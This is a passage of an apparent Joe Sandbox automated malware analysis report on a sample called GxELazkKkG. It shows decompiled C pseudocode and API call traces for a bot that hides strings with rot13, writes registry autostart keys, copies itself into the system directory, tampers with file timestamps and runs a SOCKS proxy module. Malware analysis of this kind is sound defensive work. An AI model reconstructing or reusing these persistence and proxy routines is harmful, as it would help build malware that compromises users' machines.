                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Close$CreateOpen
                                                                          • String ID: Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\ihyaiby32\Irefvba
                                                                          • API String ID: 1299239824-3858799484
                                                                          • Opcode ID: 48896b124bd474820f71979e4f946ad337c52b0363e5182aa0eb181ed28b56a5
                                                                          • Instruction ID: 372c3b0a06c6ee96941f7226abfc86991cfccc6d41bd2ee5df839bccf0e05334
                                                                          • Opcode Fuzzy Hash: 48896b124bd474820f71979e4f946ad337c52b0363e5182aa0eb181ed28b56a5
                                                                          • Instruction Fuzzy Hash: 502131B0914315CEE710EF35C58579ABBF8BB44308F408A7EE484E7281E779C6888F52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E10002EC6(intOrPtr _a4, intOrPtr _a8) {
                                                                          				char _v8;
                                                                          				char* _v24;
                                                                          				char* _v28;
                                                                          				char* _v32;
                                                                          				char* _v36;
                                                                          				char* _v40;
                                                                          				struct _SECURITY_ATTRIBUTES* _v44;
                                                                          				struct _SECURITY_ATTRIBUTES* _v48;
                                                                          				intOrPtr _v52;
                                                                          				struct _SECURITY_ATTRIBUTES* _v56;
                                                                          				void* _t46;
                                                                          
                                                                          				if(_a8 == 1) {
                                                                          					 *0x10006094 = _a4;
                                                                          					_v24 =  &_v8;
                                                                          					CreateThread(0, 0, E10002EA8, 0, 0); // executed
                                                                          					_v28 =  &_v8;
                                                                          					CreateThread(0, 0, E10002020, 0, 0); // executed
                                                                          					_v32 =  &_v8;
                                                                          					CreateThread(0, 0, E100029B8, 0, 0); // executed
                                                                          					_v36 =  &_v8;
                                                                          					CreateThread(0, 0, E10002A60, 0, 0); // executed
                                                                          					_v40 =  &_v8;
                                                                          					_v44 = 0;
                                                                          					_v48 = 0;
                                                                          					_v52 = E10002CEF;
                                                                          					_v56 = 0;
                                                                          					 *(_t46 - 0xffffffffffffffd0) = 0; // executed
                                                                          					CreateThread(??, ??, ??, ??, ??, ??); // executed
                                                                          					return 1;
                                                                          				}
                                                                          				return 1;
                                                                          			}














                                                                          0x10002ed5
                                                                          0x10002ede
                                                                          0x10002ee6
                                                                          0x10002f11
                                                                          0x10002f1c
                                                                          0x10002f47
                                                                          0x10002f52
                                                                          0x10002f7d
                                                                          0x10002f88
                                                                          0x10002fb3
                                                                          0x10002fbe
                                                                          0x10002fc2
                                                                          0x10002fca
                                                                          0x10002fd2
                                                                          0x10002fda
                                                                          0x10002fe2
                                                                          0x10002fe9
                                                                          0x00000000
                                                                          0x10002ff1
                                                                          0x10002ff7

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: db1163f0d3c2b5508896f4cc3b28de1abc3cefb256ba2f04d419c1cc24af5f4c
                                                                          • Instruction ID: 15f36a74acdf4c5ebf03c8018694f62f40f6a90330da7fbec1f69af9675bd8bc
                                                                          • Opcode Fuzzy Hash: db1163f0d3c2b5508896f4cc3b28de1abc3cefb256ba2f04d419c1cc24af5f4c
                                                                          • Instruction Fuzzy Hash: 68217EB4409345AFE300EF24C65934FBFF4EB84785F40891DE4985B285E3BA9A489F93
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E00404690(char* _a4, intOrPtr _a8, char _a12) {
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				int _v40;
                                                                          				char _v44;
                                                                          				long _t23;
                                                                          				long _t29;
                                                                          				char* _t31;
                                                                          				char _t32;
                                                                          				void* _t33;
                                                                          				void* _t35;
                                                                          				intOrPtr* _t36;
                                                                          
                                                                          				_t31 = _a4;
                                                                          				_t32 = _a12;
                                                                          				_t23 = RegOpenKeyExA(0x80000002, _t31, 0, 0x20006,  &_v16); // executed
                                                                          				_t35 = _t33 - 0xc;
                                                                          				if(_t23 == 0) {
                                                                          					L2:
                                                                          					_v44 = _t32;
                                                                          					L0040C310();
                                                                          					_t36 = _t35 - 4;
                                                                          					_v28 = _t23 + 1;
                                                                          					_v32 = _t32;
                                                                          					_v36 = 1;
                                                                          					_v40 = 0;
                                                                          					_v44 = _a8;
                                                                          					 *_t36 = _v16; // executed
                                                                          					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
                                                                          					 *((intOrPtr*)(_t36 - 0x18)) = _v16;
                                                                          					_t29 = RegCloseKey(??);
                                                                          				} else {
                                                                          					_t29 = RegOpenKeyExA(0x80000001, _t31, 0, 0x20006,  &_v16);
                                                                          					_t35 = _t35 - 0x14;
                                                                          					if(_t29 == 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t29;
                                                                          			}

















                                                                          0x00404698
                                                                          0x0040469b
                                                                          0x004046c0
                                                                          0x004046c5
                                                                          0x004046ca
                                                                          0x004046fa
                                                                          0x004046fa
                                                                          0x004046fd
                                                                          0x00404702
                                                                          0x00404706
                                                                          0x0040470a
                                                                          0x0040470e
                                                                          0x00404716
                                                                          0x00404721
                                                                          0x00404728
                                                                          0x0040472b
                                                                          0x00404736
                                                                          0x00404739
                                                                          0x004046cc
                                                                          0x004046ee
                                                                          0x004046f3
                                                                          0x004046f8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004046f8
                                                                          0x00404747

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046C0
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 004046EE
                                                                          • lstrlen.KERNEL32 ref: 004046FD
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CA0), ref: 0040472B
                                                                          • RegCloseKey.ADVAPI32 ref: 00404739
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseValuelstrlen
                                                                          • String ID:
                                                                          • API String ID: 1812710942-0
                                                                          • Opcode ID: f1a880515f559899bd4e2589cbcf0413c90a96f87d2e0a2aac5912ecd81a10fa
                                                                          • Instruction ID: 9df0ca142f19effaadb1cf883799336216af180bd5b83d8b0879c3bebcc9d83d
                                                                          • Opcode Fuzzy Hash: f1a880515f559899bd4e2589cbcf0413c90a96f87d2e0a2aac5912ecd81a10fa
                                                                          • Instruction Fuzzy Hash: A711D4B0808315AFD700EF69C58535EBBF4FB84358F40892EEC9897241E37996488B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E1000274E(char* _a4, intOrPtr _a8, char _a12) {
                                                                          				void* _v12;
                                                                          				void* _v16;
                                                                          				intOrPtr _v28;
                                                                          				intOrPtr _v32;
                                                                          				intOrPtr _v36;
                                                                          				int _v40;
                                                                          				char _v44;
                                                                          				long _t23;
                                                                          				long _t29;
                                                                          				char* _t31;
                                                                          				char _t32;
                                                                          				void* _t33;
                                                                          				void* _t35;
                                                                          				intOrPtr* _t36;
                                                                          
                                                                          				_t31 = _a4;
                                                                          				_t32 = _a12;
                                                                          				_t23 = RegOpenKeyExA(0x80000002, _t31, 0, 0x20006,  &_v16);
                                                                          				_t35 = _t33 - 0xc;
                                                                          				if(_t23 == 0) {
                                                                          					L2:
                                                                          					_v44 = _t32;
                                                                          					L10003570();
                                                                          					_t36 = _t35 - 4;
                                                                          					_v28 = _t23 + 1;
                                                                          					_v32 = _t32;
                                                                          					_v36 = 1;
                                                                          					_v40 = 0;
                                                                          					_v44 = _a8;
                                                                          					 *_t36 = _v16; // executed
                                                                          					RegSetValueExA(??, ??, ??, ??, ??, ??); // executed
                                                                          					 *((intOrPtr*)(_t36 - 0x18)) = _v16;
                                                                          					_t29 = RegCloseKey(??);
                                                                          				} else {
                                                                          					_t29 = RegOpenKeyExA(0x80000001, _t31, 0, 0x20006,  &_v16);
                                                                          					_t35 = _t35 - 0x14;
                                                                          					if(_t29 == 0) {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				return _t29;
                                                                          			}

















                                                                          0x10002756
                                                                          0x10002759
                                                                          0x1000277e
                                                                          0x10002783
                                                                          0x10002788
                                                                          0x100027b8
                                                                          0x100027b8
                                                                          0x100027bb
                                                                          0x100027c0
                                                                          0x100027c4
                                                                          0x100027c8
                                                                          0x100027cc
                                                                          0x100027d4
                                                                          0x100027df
                                                                          0x100027e6
                                                                          0x100027e9
                                                                          0x100027f4
                                                                          0x100027f7
                                                                          0x1000278a
                                                                          0x100027ac
                                                                          0x100027b1
                                                                          0x100027b6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x100027b6
                                                                          0x10002805

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseValuelstrlen
                                                                          • String ID:
                                                                          • API String ID: 1812710942-0
                                                                          • Opcode ID: 8076f9db43a5ac6dba544c66358812596f95421586db3cef0b3e8a3b3525caf9
                                                                          • Instruction ID: a357a9c538cd1e9a3b197412e68688e2a35a0a2f8c1334e24df635a0a12a9609
                                                                          • Opcode Fuzzy Hash: 8076f9db43a5ac6dba544c66358812596f95421586db3cef0b3e8a3b3525caf9
                                                                          • Instruction Fuzzy Hash: 5D11D4B4808305AFE700EF69D58535FBBF8EF44394F00882EEC9887245E375E6488B82
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • rot13.SHERVANS ref: 100029D3
                                                                            • Part of subcall function 10001F26: rot13c.SHERVANS ref: 10001F40
                                                                          • add_system_direcroty.SHERVANS ref: 100029ED
                                                                            • Part of subcall function 10002209: memset.MSVCRT ref: 10002226
                                                                            • Part of subcall function 10002209: GetSystemDirectoryA.KERNEL32 ref: 10002232
                                                                            • Part of subcall function 10002209: lstrlen.KERNEL32 ref: 1000223D
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002257
                                                                            • Part of subcall function 10002209: lstrcat.KERNEL32 ref: 10002269
                                                                          • autostart_bot.SHERVANS ref: 100029F2
                                                                            • Part of subcall function 1000237F: rot13.SHERVANS ref: 1000239A
                                                                            • Part of subcall function 1000237F: add_system_direcroty.SHERVANS ref: 100023B4
                                                                            • Part of subcall function 1000237F: rot13.SHERVANS ref: 100023CA
                                                                            • Part of subcall function 1000237F: rot13.SHERVANS ref: 100023E0
                                                                            • Part of subcall function 1000237F: RegOpenKeyExA.ADVAPI32 ref: 1000240A
                                                                            • Part of subcall function 1000237F: RegOpenKeyExA.ADVAPI32 ref: 1000243B
                                                                            • Part of subcall function 1000237F: lstrlen.KERNEL32 ref: 10002450
                                                                            • Part of subcall function 1000237F: RegSetValueExA.ADVAPI32 ref: 10002484
                                                                            • Part of subcall function 1000237F: RegCloseKey.ADVAPI32 ref: 10002495
                                                                          • Sleep.KERNEL32 ref: 10002A04
                                                                          • xsocks5.SHERVANS ref: 10002A0F
                                                                            • Part of subcall function 10002278: rot13.SHERVANS ref: 10002297
                                                                            • Part of subcall function 10002278: RegOpenKeyExA.ADVAPI32 ref: 100022C1
                                                                            • Part of subcall function 10002278: RegCreateKeyExA.ADVAPI32 ref: 10002312
                                                                            • Part of subcall function 10002278: lstrlen.KERNEL32 ref: 10002326
                                                                            • Part of subcall function 10002278: RegSetValueExA.ADVAPI32 ref: 10002358
                                                                            • Part of subcall function 10002278: RegCloseKey.ADVAPI32 ref: 10002369
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: rot13$Openlstrlen$CloseValueadd_system_direcrotylstrcat$CreateDirectorySleepSystemautostart_botmemsetrot13cxsocks5
                                                                          • String ID:
                                                                          • API String ID: 1953300677-0
                                                                          • Opcode ID: 2f4a38cdcf28ce0af05b94f57a53248966ada0ad6c96a035229aa7fbd1f2329a
                                                                          • Instruction ID: e766e933713ebb2fd00dc86ca103d495f6d4a30245a9b19533916551fb43bf76
                                                                          • Opcode Fuzzy Hash: 2f4a38cdcf28ce0af05b94f57a53248966ada0ad6c96a035229aa7fbd1f2329a
                                                                          • Instruction Fuzzy Hash: 9FF0C0B4408708ABE750EF60C58565EBBB4EF00390F41896CE8C94324AE73565C89F53
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32 ref: 004056F4
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                          • CopyFileA.KERNEL32 ref: 0040573B
                                                                            • Part of subcall function 004054F2: CreateFileA.KERNEL32 ref: 00405531
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405574
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040559A
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 004055A9
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 004055D4
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004055FA
                                                                            • Part of subcall function 004054F2: Sleep.KERNEL32 ref: 00405609
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 00405634
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 0040565A
                                                                            • Part of subcall function 004054F2: SetFilePointer.KERNEL32 ref: 0040567D
                                                                            • Part of subcall function 004054F2: WriteFile.KERNEL32 ref: 004056AF
                                                                            • Part of subcall function 004054F2: CloseHandle.KERNEL32 ref: 004056C0
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404399
                                                                            • Part of subcall function 0040435C: GetFileTime.KERNEL32 ref: 004043CD
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 004043E5
                                                                            • Part of subcall function 0040435C: CreateFileA.KERNEL32 ref: 00404423
                                                                            • Part of subcall function 0040435C: SetFileTime.KERNEL32 ref: 00404453
                                                                            • Part of subcall function 0040435C: CloseHandle.KERNEL32 ref: 00404467
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: File$PointerWrite$CloseCreateHandle$SleepTimelstrcat$CopyDirectoryModuleNameSystemlstrlenmemset
                                                                          • String ID: tepbcl.qyy$user32.dll
                                                                          • API String ID: 3363447152-446725262
                                                                          • Opcode ID: de95d79bbbfaf08a5f65ed3c41234fbb1e38ded78e62ee2fe25aec3cbfbd0c72
                                                                          • Instruction ID: 761182c28210547fcfec4951540a2b2b9fde320736257bd646c4dd079449f565
                                                                          • Opcode Fuzzy Hash: de95d79bbbfaf08a5f65ed3c41234fbb1e38ded78e62ee2fe25aec3cbfbd0c72
                                                                          • Instruction Fuzzy Hash: D401EDF08097149AC710BF65D58529EBFF4EF84758F01886EF5C827281C7B95588CB97
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3546245721-0
                                                                          • Opcode ID: ad9b9523f42a2e9449b14fb8281407f1dc35ffddc838d3f016af78ec4bc48b7f
                                                                          • Instruction ID: b21aa83fbe8ad37c53a20fbf8e9d077e9d87781769b07b01f65202f866b88801
                                                                          • Opcode Fuzzy Hash: ad9b9523f42a2e9449b14fb8281407f1dc35ffddc838d3f016af78ec4bc48b7f
                                                                          • Instruction Fuzzy Hash: 3621C8B49043099FE700EF69C58575EBBF4EF48384F40886DE89897345E374DA488B52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00404A84), ref: 00404781
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047AF
                                                                          • RegQueryValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00404A84), ref: 004047EA
                                                                          • RegCloseKey.ADVAPI32 ref: 004047FA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3546245721-0
                                                                          • Opcode ID: 788364dfb925f572286ead044381b62b9ce985eb10bd0cffd60a9e6ef2279f1d
                                                                          • Instruction ID: 6ed68635854e72cbad61cdb7226dc2d583aa3803ebbc72776a4c5814d6946410
                                                                          • Opcode Fuzzy Hash: 788364dfb925f572286ead044381b62b9ce985eb10bd0cffd60a9e6ef2279f1d
                                                                          • Instruction Fuzzy Hash: 962179B49043099FD700EF69D58579EBBF4BB48354F40896EE89897341E378D648CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3546245721-0
                                                                          • Opcode ID: 27a766e30244a2e05984018c0b4b905970e7196a3b8cd9ad0044181cec5309ac
                                                                          • Instruction ID: 85737ef945bcec28308b1c993999e411a83c54719117432306d8d37fab97eb4a
                                                                          • Opcode Fuzzy Hash: 27a766e30244a2e05984018c0b4b905970e7196a3b8cd9ad0044181cec5309ac
                                                                          • Instruction Fuzzy Hash: 082193B4904309AFDB00EF69C58579EBBF4EF48394F40886DE89893345E374D6488B92
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00403CC4), ref: 0040490E
                                                                          • RegOpenKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403CC4), ref: 0040493C
                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404974
                                                                          • RegCloseKey.ADVAPI32 ref: 00404982
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: Open$CloseValue
                                                                          • String ID:
                                                                          • API String ID: 503941690-0
                                                                          • Opcode ID: 8273f13c3081dc19d4445e322601c3b2f268dd5fec60ff3e337f340c7e888451
